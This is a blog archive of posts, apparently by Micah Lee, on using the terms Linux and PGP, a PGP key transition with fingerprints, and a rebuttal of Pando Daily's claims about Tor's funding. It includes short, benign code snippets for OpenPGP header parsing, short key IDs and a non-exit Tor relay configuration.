<p>After writing a column about how to <a href="https://theintercept.com/2015/07/14/communicating-secret-watched/">communicate in secret while we’re all being watched</a>, I got an email from Richard Stallman saying that when I say Linux I clearly mean the GNU system, and he asked that I start referring to Linux distributions as GNU/Linux “so as to give us equal mention when you talk about our work.” And after writing my most recent column about how <a href="https://theintercept.com/2015/09/16/getting-hacked-doesnt-bad/">VMs can be used for isolation security</a>, Stallman wrote a <a href="https://theintercept.com/2015/09/16/getting-hacked-doesnt-bad/?comments=1#comment-164975">comment</a> again saying that I mean “GNU and Linux” and asking that I give GNU equal mention. This is a really common point of view (though not at all a consensus) in the free software community, and one that I shared for a long time. But I’ve come to change my mind.</p>
<p>When I talk about Linux, I’m not talking about the GNU system. I’m also not talking about a kernel. Twenty years ago GNU/Linux really was mostly the GNU system plus the Linux kernel, because GNU didn’t have its own kernel. But today when I say Linux I’m talking about something else entirely. I’m referring to the type of open source operating systems that are typically composed of the Linux kernel plus a plethora of userland projects. These usually include some of the <a href="https://www.gnu.org/software/">GNU system projects</a>, but they also include (pre-installed or in repositories) thousands of other open source projects, like desktop environments, web browsers, office software, programming languages, libraries and tools, hypervisors, server software, games, and so on and so forth.</p>
<p>“GNU/Linux” doesn’t accurately describe this type of operating system at all. A whole lot has changed since the GNU system was first developed. Of course, “Linux” doesn’t accurately describe it either, so why do I use that term?</p>
<p>Because that’s what the term means. The <a href="http://dictionary.reference.com/browse/linux?s=t">definition</a> of Linux (according to dictionary.com, though other dictionaries have similar definitions) is: “an operating system, based on UNIX, that runs on many different hardware platforms and whose source code is available to the public.” The origin of the term Linux comes from the kernel, but the colloquial definition – what normal people think when they hear and say Linux (assuming they’ve heard of it at all) – is an open source operating system. I would guess that most people who have heard of Linux, and have a general idea of what it is, have no idea what a kernel is.</p>
<p>Unfortunately for Stallman, language evolves naturally, and trying to force changes in language doesn’t always work out. If you’re looking at language <a href="https://en.wikipedia.org/wiki/Linguistic_description">descriptively</a> instead of <a href="https://en.wikipedia.org/wiki/Linguistic_prescription">prescriptively</a>, Linux, not GNU/Linux, is the term that people use most of the time when referring to a Linux distribution, so that’s what that term means.</p>
<p>And I don’t mean to say that everyone should stop saying GNU/Linux in favor of Linux. The choice is yours. I’m just explaining my reasoning behind it.</p>
<p>And while I’m at it, I thought I’d explain why I use the term PGP instead of GPG. I used to only refer to PGP keys as “GPG keys” and I didn’t like using the term PGP at all because there’s a proprietary encryption product (that no one uses, and no one should use) that <a href="https://en.wikipedia.org/wiki/PGP_Corporation">used to go by that name</a>. But then, as I learned more, I realized that PGP is simply a more accurate term.</p>
<p>GPG is short for <a href="https://gnupg.org/">GnuPG</a>, a free software encryption program that complies with <a href="https://tools.ietf.org/html/rfc4880">RFC 4880</a>, which is the current technical spec that describes the <a href="https://en.wikipedia.org/wiki/Pretty_Good_Privacy#OpenPGP">OpenPGP</a> message format. When I use the term PGP, as in, “<a href="https://micahflee.com/pgp.asc">Here</a> is a copy of my PGP key,” it’s short for OpenPGP, and has nothing at all to do with the proprietary program. Many different projects comply with the OpenPGP spec, like Google’s <a href="https://github.com/google/end-to-end">End-to-End</a>, <a href="http://openpgpjs.org/">OpenPGP.js</a>, and <a href="https://pypi.python.org/pypi/pgpdump">pgpdump</a>, to name a few – and none of these share code with GPG.</p>
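<p>To make the RFC 4880 message format a bit more concrete, here’s a minimal sketch (the function name and sample octets are my own, not taken from any of these projects) of how the packet tag is decoded from the first octet of an OpenPGP packet header:</p>

```python
def parse_packet_tag(first_octet: int) -> int:
    """Decode the packet tag from the first octet of an OpenPGP
    packet header (RFC 4880, section 4.2)."""
    if not first_octet & 0x80:
        # Bit 7 is always set in a valid packet header
        raise ValueError("not an OpenPGP packet header")
    if first_octet & 0x40:
        # New-format packet: the tag fills bits 5-0
        return first_octet & 0x3F
    # Old-format packet: the tag sits in bits 5-2
    return (first_octet >> 2) & 0x0F

# Tag 6 is a public-key packet in both header formats:
print(parse_packet_tag(0x99))  # old format → 6
print(parse_packet_tag(0xC6))  # new format → 6
```

<p>Parsers like pgpdump begin with exactly this kind of header decoding before walking the rest of the message, which is why so many independent implementations can interoperate without sharing code.</p>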
<p>But, most importantly, I use the terms Linux and PGP instead of GNU/Linux and GPG because that’s how people colloquially speak about these technologies. Technology is already confusing enough, and despite how cool recursive acronyms are, insisting that everyone use one piece of jargon over another piece of jargon doesn’t do anything to help people who are new at it learn and tinker.</p>
<h1 id="transitioning-pgp-keys">Transitioning PGP keys</h1><p><em>By Micah Lee, posted: 2015-08-17</em></p>
<p>I’m switching from my old key:</p>
<pre><code>pub 4096R/EBA34B1C 2014-05-08 [expires: 2016-05-05]
Key fingerprint = 0B14 9192 9806 5962 5470 0155 FD72 0AD9 EBA3 4B1C
uid Micah Lee &lt;micah@micahflee.com&gt;
uid Micah Lee &lt;micah@firstlook.org&gt;
uid Micah Lee &lt;micah.lee@firstlook.org&gt;
uid Micah Lee &lt;micah.lee@theintercept.com&gt;
uid Micah Lee &lt;micah@pressfreedomfoundation.org&gt;
uid Micah Lee &lt;micah@freedom.press&gt;
sub 4096R/64B1D8D1 2014-05-08 [expires: 2016-05-05]
</code></pre>
<p>to the following key:</p>
<pre><code>pub 4096R/CD994F73 2015-08-14 [expires: 2016-08-13]
Key fingerprint = 927F 419D 7EC8 2C2F 149C 1BD1 403C 2657 CD99 4F73
uid Micah Lee &lt;micah@micahflee.com&gt;
uid Micah Lee &lt;micah@freedom.press&gt;
uid Micah Lee &lt;micah.lee@theintercept.com&gt;
uid Micah Lee &lt;micah@firstlook.org&gt;
sub 4096R/5D5F1356 2015-08-14 [expires: 2016-08-13]
</code></pre>
<p>Here’s a copy of my <a href="https://micahflee.com/gpg.asc">new public key</a>, and here’s a <a href="https://micahflee.com/wp-content/uploads/2015/08/key-transition-2015-08-17.txt.asc">key transition statement</a> that I signed with my old key.</p>
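<p>As a small aside, the short key IDs above (EBA34B1C, CD994F73) are just the last eight hex digits of the corresponding fingerprint, which is easy to check yourself. A quick sketch (short key IDs are trivial to spoof, which is part of why the full fingerprints are listed; always verify the whole fingerprint):</p>

```python
def short_key_id(fingerprint: str) -> str:
    # For V4 OpenPGP keys, the 32-bit "short" key ID is simply
    # the last 8 hex digits of the 160-bit fingerprint.
    return fingerprint.replace(" ", "").upper()[-8:]

old_fpr = "0B14 9192 9806 5962 5470 0155 FD72 0AD9 EBA3 4B1C"
new_fpr = "927F 419D 7EC8 2C2F 149C 1BD1 403C 2657 CD99 4F73"
print(short_key_id(old_fpr))  # EBA34B1C
print(short_key_id(new_fpr))  # CD994F73
```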
<h1 id="fact-checking-pandos-smears-against-tor">Fact-checking Pando’s smears against Tor</h1><p><em>By Micah Lee, posted: 2014-12-11</em></p>
<p>If you’ve been able to ignore Pando Daily’s 100% non-technical smear campaign against the Tor Project and its developers and supporters, you’re lucky, and you may wish to stop reading now. Otherwise, read on, and perhaps prepare to lose a few brain cells.</p>
<p>Yasha Levine’s “<a href="http://pando.com/2014/07/16/tor-spooks/">investigation</a>” against Tor unveiled what’s already prominently displayed on Tor’s website: that it was designed by the Navy and that it receives a lot of federal funding, the bulk of which comes from the Department of Defense.</p>
<p>To be clear, talking about Tor’s government funding is a very important discussion to have. But Yasha didn’t discuss potential threats to Tor users’ anonymity that this funding might cause, nor what potential solutions would be. Instead, he implied that there’s some sort of conspiracy between Tor developers and the US government, and that the Tor network cannot be trusted, apparently oblivious that the decentralized and open nature of the Tor network and its codebase makes planting backdoors nearly impossible.</p>
<p><strong>Trolling, harassment, and spreading conspiracy theories</strong></p>
<p>Using only the fact that Tor receives federal funding, Pando has managed to rile up an anti-Tor community of Twitter trolls who insist that blatantly false things are true, like: using Tor makes it <em>easier</em> for the government to track you, that Tor is a honeytrap, that Tor developers are anti-privacy and support NSA spying, and that you can tell everything about a woman because she dyes her hair.</p>
<p>They also borrow tactics from GamerGate, including making puppet Twitter accounts to <a href="http://charon.persephoneslair.org/~andrea/pandorasts/jeremy_becker/">harass women</a>, and to continue harassing people when they get blocked. They even started using the GamerGate-copycat hashtag #TorGate, not realizing that it kinda reinforces the sexist troll image they’re trying to deny.</p>
<p><img src="torgate.png" alt="#TorGate"></p>
<p><strong>Government funding might be the first step in exposing a scandal, but not the only step</strong></p>
<p>Throughout all of this, the Pando people (Yasha Levine, Paul Carr, and Mark Ames) and their #TorGate followers haven’t presented a shred of technical evidence against Tor’s safety. Their concerns are 100% speculation. They make the government funding point (an easy point to make since Tor prominently lists their <a href="https://www.torproject.org/about/sponsors.html.en">sponsors</a> and publishes <a href="https://www.torproject.org/about/financials.html.en">financial reports</a> for the sake of transparency), but then fail to connect any dots.</p>
<p>This is important because if they could present an actual, specific concern, we could verify whether it’s real. The code is open, and anyone (including you) can easily run and study their own Tor nodes to confirm their suspicions.</p>
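<p>Running a node really is that accessible. Here’s a minimal torrc sketch for a non-exit relay (the nickname and contact address below are placeholders; consult the Tor Project’s relay documentation for current guidance before running one):</p>

```
# Minimal non-exit Tor relay configuration (torrc sketch).
# Nickname and ContactInfo are placeholders.
ORPort 9001
Nickname ExampleRelay
ContactInfo tor-admin@example.com
# Carry traffic for the network, but never act as an exit node.
ExitPolicy reject *:*
```

<p>With a relay of your own running, you can observe exactly what passes through it, which is the point: suspicions about the network are testable.</p>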
<p>Security issues with Tor get discovered all the time, and each time they get thoroughly researched (someone often ends up publishing a paper), the codebase gets patched, and Tor blogs about it to inform the public what the problem was and how it was fixed. See some recent examples <a href="https://blog.torproject.org/blog/what-spoiled-onions-paper-means-tor-users">here</a>, <a href="https://blog.torproject.org/blog/thoughts-and-concerns-about-operation-onymous">here</a>, <a href="https://blog.torproject.org/blog/advisory-remote-dos-when-using-tor-recent-openssl-versions-built-no-ssl3-option">here</a>, <a href="https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack">here</a>, <a href="https://blog.torproject.org/blog/isec-partners-conducts-tor-browser-hardening-study">here</a>, and <a href="https://blog.torproject.org/blog/quick-summary-recent-traffic-correlation-using-netflows">here</a>.</p>
<p>The #TorGate people don’t know of any problems that exist with Tor or they would articulate what they are. They’re not interested in fixing problems to make Tor safer for everyone, they’re only interested in spreading conspiracies about Tor being run by the Feds as a honeytrap to spy on activists. These accusations are quite serious considering that activists around the world literally rely on Tor for their lives. Fortunately, they’re complete nonsense.</p>
<p>When I <a href="https://twitter.com/micahflee/status/538147229228232704">asked Yasha on Twitter</a> how he would fix Tor to make it trustworthy and safe for everyone to use, the best he could come up with is to post prominent warnings on Tor’s website that says “USE AT OWN RISK” because it receives DoD grants. Keep in mind that potential answers could be: fork the project (it’s open source, after all) and build a separate onion routing network that doesn’t receive government funding; stop applying for government grants in favor of other sources of funding; etc.</p>
<p><strong>Fact checking Pando’s Tor smear</strong></p>
<p>In the faux-exposé that started all of this, “<a href="http://pando.com/2014/07/16/tor-spooks/">Almost everyone involved in developing Tor was (or is) funded by the US government</a>”, Yasha writes:</p>
<blockquote><p>Let’s start with the basics: Tor was developed, built and financed by the US military-surveillance complex. Tor’s original — and current — purpose is to cloak the online identity of government agents and informants while they are in the field: gathering intelligence, setting up sting operations, giving human intelligence assets a way to report back to their handlers — that kind of thing. This information is out there, but it’s not very well known, and it’s certainly not emphasized by those who promote it.</p>
</blockquote>
<p>Cloaking the online identity of government agents and informants is likely the reason that the DoD helps fund Tor—they depend on it as much as everyone else—but this is not the purpose of Tor.</p>
<p>The purpose of Tor is to let anybody—normal internet users, businesses with trade secrets, activists, journalists and their sources, police, and yes, the military—have an anonymous connection to the net. If an onion routing network has any hope of hiding who is using it, it needs a diversity of users, all of whom receive equal benefits of anonymity.</p>
<p>This paper by Acquisti, Dingledine, and Syverson, <a href="http://freehaven.net/doc/fc03/econymics.pdf">On the Economics of Anonymity</a>, goes into much greater detail, but here’s a quote from it that accurately describes the true purpose of Tor:</p>
<blockquote><p>Single-hop web proxies like the Anonymizer protect end users from simple threats like profile-creating websites. On the other hand, users of such commercial proxies are forced to trust them to protect traffic information. Many users, particularly large organizations, are rightly hesitant to use an anonymity infrastructure they do not control. However, on an open network such as the Internet, running one’s own system won’t work: a system that carries traffic for only one organization will not hide the traffic entering and leaving that organization. Nodes must carry traffic from others to provide cover. The only viable solution is to distribute trust. That is, each party can choose to run a node in a shared infrastructure, if its incentives are large enough to support the associated costs. Users with more modest budgets or shorter-term interest in the system also benefit from this decentralized model, because they can be confident that a few colluding nodes are unlikely to uncover their anonymity.</p>
</blockquote>
<p>In short, the diversity of users is what makes Tor work. If Tor were only built for US spies to use then anyone who sees a Tor user visit their website knows that the spies must be interested in them. Because Tor has millions of diverse users, if you see a Tor user visit your website all you know is that they’re using Tor. They could be a spy, but they could also be an activist, a hacker, or just someone who doesn’t want ad networks tracking them as they browse the web. You simply don’t know, and that’s what makes it work. Here’s an excellent overview of the diverse communities of people that benefit equally from Tor.</p>
<p>Yasha claims that: “This information is out there, but it’s not very well known, and it’s certainly not emphasized by those who promote it.” Here’s a screenshot from the front-page of Tor’s website. Notice the “Military & Law Enforcement” section.</p>
<p><img src="who-uses-tor.png" alt="Who Uses Tor"></p>
<p>Check out the prominent <a href="https://www.torproject.org/about/overview.html.en">Tor overview page</a> which begins:</p>
<blockquote><p>Tor was originally designed, implemented, and deployed as a third-generation <a href="http://www.onion-router.net/">onion routing project of the U.S. Naval Research Laboratory</a>. It was originally developed with the U.S. Navy in mind, for the primary purpose of protecting government communications. Today, it is used every day for a wide variety of purposes by normal people, the military, journalists, law enforcement officers, activists, and many others.</p>
</blockquote>
<p>The Tor Project has always been completely honest about their origin and funding. In fact, the non-profit goes further than any other organization I know of to be <a href="https://blog.torproject.org/blog/transparency-openness-and-our-2013-financials">transparent about everything it does</a>, including funding. If you can find any organization that is as transparent as the Tor Project, please post about it in the comments. I’m curious if one exists.</p>
<p>Continuing on with Yasha’s hit piece, he goes on to cherry-pick the military and police uses of Tor, ignoring the <a href="https://www.torproject.org/about/torusers.html.en">rest of the users</a>, and then sets the stage for conspiracy nonsense:</p>
<blockquote><p>NSA? DoD? U.S. Navy? Police surveillance? What the hell is going on? How is it possible that a privacy tool was created by the same military and intelligence agencies that it’s supposed to guard us against? Is it a ruse? A sham? A honeytrap? Maybe I’m just being too paranoid…</p>
<p>Unfortunately, this is not a tinfoil hat conspiracy theory. It is cold hard fact.</p>
</blockquote>
<p>Then Yasha goes on to explain the history of Tor, its military origins, and how the project was open sourced and handed to EFF to manage. He quotes a 2004 EFF press release about Tor and accuses them of failing to mention that “this anonymity tool was developed primarily for military and intelligence use.” He criticizes them for focusing on its ability to protect free speech from oppressive regimes. EFF focused on this because <em>Tor can help protect free speech from oppressive regimes</em>. EFF is a non-profit law firm that’s devoted to upholding constitutional rights online. Just as the Navy supports Tor because they can use it to communicate securely, EFF supports Tor because it’s <em>a vital tool for free speech and censorship circumvention</em>. Yasha seems to be pretending that ordinary people’s privacy isn’t protected when they use Tor, which is a lie.</p>
<p>Tor is a tide that lifts all boats. When Tor was open sourced, it was no longer “developed primarily for military and intelligence use.” It was opened up under a <a href="https://www.torproject.org/docs/faq.html.en#DistributingTor">free software license</a> and given to all internet users, in all their diversity, who have owned it and relied on it ever since. It’s used by government agents, police investigating drug dealers, drug dealers trying not to get caught by police, investigative journalists, whistleblowers, and private citizens trying to browse the web privately.</p>
<p>In the end Tor does one thing: it keeps people’s IP addresses anonymous while they use the internet. This is why everyone with a vested interest in online anonymity, including the DoD (to keep their agents safe), and EFF (which is currently suing the NSA for illegal spying), supports Tor.</p>
<p>Yasha goes on to outline Tor’s funding sources, much of them from either the DoD or the State Department.</p>
<p>I’d like to take a moment to point out that Tor’s funding model has some big problems. It’s dangerous to be too reliant on a single entity for funding—if their federal funding is cut, Tor is in trouble. And of course funders might try to influence the direction of the project and the research. In Tor’s case this is mitigated by the fact that 100% of the scientific research and source code that Tor releases is open, that the crypto math is peer-reviewed and backed up by the <a href="https://micahflee.com/2014/06/the-universe-believes-in-encryption/">laws of physics</a>, and by the fact that the Tor Project itself doesn’t run the network—the network is diverse and decentralized, run by volunteers all over the world (me included). It would be excellent if there were a way for Tor to get weaned off DoD funding and replace the bulk of it with some other source. And I’m sure they would be interested in doing this, if other sources of money made themselves available.</p>
<p>Personally I prefer that Tor gets the funding it needs to continue its groundbreaking anonymity research and to continue to improve its product and the stability of its network. I rely on it on a daily basis to do my work in journalism and source protection safely and securely. It would be great to have a real conversation about this without Pando’s baseless conspiracy theories.</p>
<p>In the section “How safe is Tor, really?”, Yasha points out that traffic correlation attacks exist, and that Tor isn’t safe against global adversaries (which are both likely-unsolvable low-latency onion routing problems that have been outlined in Tor’s <a href="https://svn.torproject.org/svn/projects/design-paper/tor-design.pdf">design document</a> since at least 2004). Tor has done more research on these issues than anyone else, and the latest version of Tor is the state-of-the-art technology in this area, but it will probably never be perfect, because it’s probably not possible for it to be perfect.</p>
<p>In his hit piece, Yasha lists some examples of Tor failing to protect people:</p>
<ul>
<li>The Harvard kid who was the only Tor user on Harvard’s network at the time that he sent his bomb threat.</li>
<li>The Freedom Hosting and Silk Road hacks (problems with the web apps that were hosted as Tor hidden services, not with Tor itself).</li>
<li>Exit node sniffing (an issue with people using plaintext protocols on the internet; people are just as vulnerable when using airport wifi, though perhaps they’re less likely to have an attacker on their network than to be using a malicious exit node).</li>
</ul>
<p>These sorts of things happen a lot, and they will continue to happen a lot. Like plane crashes, we can study and learn from them each time to make them less likely to happen in the future. Tor continues to improve, and to make these attacks harder, more expensive, or impossible to pull off.</p>
<p>For example, when the FBI hacked Freedom Hosting servers and started attacking visitors’ Tor Browsers with javascript exploits, they could only attack old versions of Tor Browser (the exploit targeted an old Firefox vulnerability) because new versions weren’t vulnerable. The major problem there was that people weren’t upgrading their software. Now Tor Browser doesn’t just warn you when your browser is out-of-date, it automatically upgrades it for you too. Next time a Freedom Hosting-style attack happens, no one will be running an outdated Tor Browser.</p>
<p>This doesn’t mean that it’s dangerous to use Tor, especially if you pay attention to the <a href="https://www.torproject.org/download/download-easy.html.en#warning">list of things to pay attention to</a> that all Tor users see when they download Tor Browser, and again when they open Tor Browser. It certainly doesn’t mean that Tor is a honeytrap.</p>
<p>Yasha references Snowden documents (2.5 years old at this point) about NSA’s attempts to attack Tor. Of course, he didn’t mention the slide that confirms that (at least 2.5 years ago) NSA wasn’t a global adversary, and therefore couldn’t easily deanonymize Tor users by connecting the routing dots. We’ve learned a lot about NSA’s almost omnipotent capabilities from the Snowden leaks, and this slide gave me great hope that we still have a fighting chance at privacy.</p>
<p><img src="tor-stinks.png" alt="Tor Stinks"></p>
<p>He states that: “Tor co-founder Roger Dingledine revealed that the Tor Network is configured to prioritize speed and route traffic through the fastest servers/nodes available,” as if this were a secret, and Roger weren’t discussing it in order to figure out how to solve the problem of the trade-off between circuit diversity and speed.</p>
<p>It’s important to know that simply running high bandwidth nodes doesn’t mean you’re malicious. Unless you’re an exit node, 100% of the traffic that travels through your node is encrypted. If you are an exit node, then you can only easily spy on plaintext traffic, e.g. you can see HTTP traffic but you can’t see HTTPS traffic—the same as a normal network attacker on open wifi. And unless you control both the entry and exit nodes in a single circuit (much of the arms race right now is focused on making this impossible), you can’t deanonymize anyone. Tor is built this way by design.</p>
<p>Finally, Yasha ends the article with Edward Snowden and the fact that he ran some high-bandwidth Tor nodes, as if this were a bad or sketchy thing for him to do. Running Tor nodes is an excellent way for anyone who cares about internet freedom and privacy as much as Snowden does to contribute to the movement.</p>
<p><strong>Pando is not a credible news source</strong></p>
<p>Investigative journalism is incredibly important, even when the target of the investigation is an organization like the Tor Project. Following the money is a great way to begin discovering corruption. Pando’s reporting about Tor is not investigative journalism. They set out to attack Tor, found that it gets lots of government funding, and wrote a story about that, pretending that that’s the same thing as Tor being malicious.</p>
<p>If there were some sort of document, like an email or a contract, that shows that a Tor developer was doing something malicious on behalf of the government, that would be a huge piece of investigative journalism. If there were evidence of an intentional design flaw in the Tor network, similar to NSA’s sabotage of encryption standards through their <a href="https://en.wikipedia.org/wiki/Bullrun_(decryption_program)">BULLRUN</a> program, that would be a huge deal. Pando didn’t find anything that wasn’t published on torproject.org.</p>
<p>Who knows Pando’s true motives—most likely, they’re doing it for the traffic by stirring up controversy, like a tabloid. But regardless of the intentions, they’re certainly attacking one of the most important privacy tools in our collective toolbag. Nothing good will come from people who truly need Tor, such as whistleblowers and dissidents, believing Pando’s nonsense.</p>
<p>Luckily, I don’t think that’s likely to happen.</p>